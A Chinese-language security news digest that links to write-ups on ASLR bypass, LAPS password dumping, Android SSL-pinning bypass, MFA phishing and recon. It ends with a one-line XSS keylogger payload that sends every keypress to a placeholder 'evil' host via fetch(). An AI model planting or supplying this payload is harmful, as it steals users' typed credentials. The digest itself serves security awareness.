热点概要:picoCTF Write-up:通过格式化字符串漏洞绕过ASLR、通过ldapsearch dump LAPS密码、通过Frida绕过Android SSL Pinning、使用ESP8266模块进行身份验证攻击、探索基于语音的身份认证系统命令注入、hackerone官博分享如何进行渗透测试前期的信息收集
资讯类:
IBM启动物联网、车联网安全测试服务
http://www.securityweek.com/ibm-launches-security-testing-services-cars-iot
【国际资讯】英国男子认罪,利用Mirai僵尸网络攻击德国电信近百万台路由器
http://bobao.360.cn/news/detail/4238.html
技术类:
picoCTF Write-up:通过格式化字符串漏洞绕过ASLR
https://0x00sec.org/t/picoctf-write-up-bypassing-aslr-via-format-string-bug/1920
通过ldapsearch dump LAPS密码
https://room362.com/post/2017/dump-laps-passwords-with-ldapsearch/
通过Frida绕过Android SSL Pinning
https://techblog.mediaservice.net/2017/07/universal-android-ssl-pinning-bypass-with-frida/
使用ESP8266模块进行身份验证攻击
Open Sourcing JA3:用于恶意软件检测的SSL/TLS客户端指纹识别项目
https://engineering.salesforce.com/open-sourcing-ja3-92c9e53c3c41
探索基于语音的身份认证系统命令注入
https://www.youtube.com/playlist?list=PLl6DAJhNeWAmOcGC38tLlFGdevLniiUmG
元数据:黑客最好的朋友
https://blog.sweepatic.com/metadata-hackers-best-friend/
针对有双因子认证站点的钓鱼手段
http://www.openskycorp.com/resource-center/blog/phishing-way-past-multi-factor-authentication/
hackerone官博分享如何进行渗透测试前期的信息收集
https://www.hackerone.com/blog/how-to-recon-and-content-discovery
Kali Linux官方书籍
https://kali.training/downloads/Kali_Revealed_1st_edition.pdf
Unsupervised Clustering Under Temporal Feature Volatility in Network Stack Fingerprinting
http://irl.cs.tamu.edu/people/zain/papers/sigmetrics2016.pdf
XSS Keylogger
<img src=x onerror='document.onkeypress=function(e){fetch("//evil?k="+String.fromCharCode(e.which))},this.remove();'>from @i_bo0om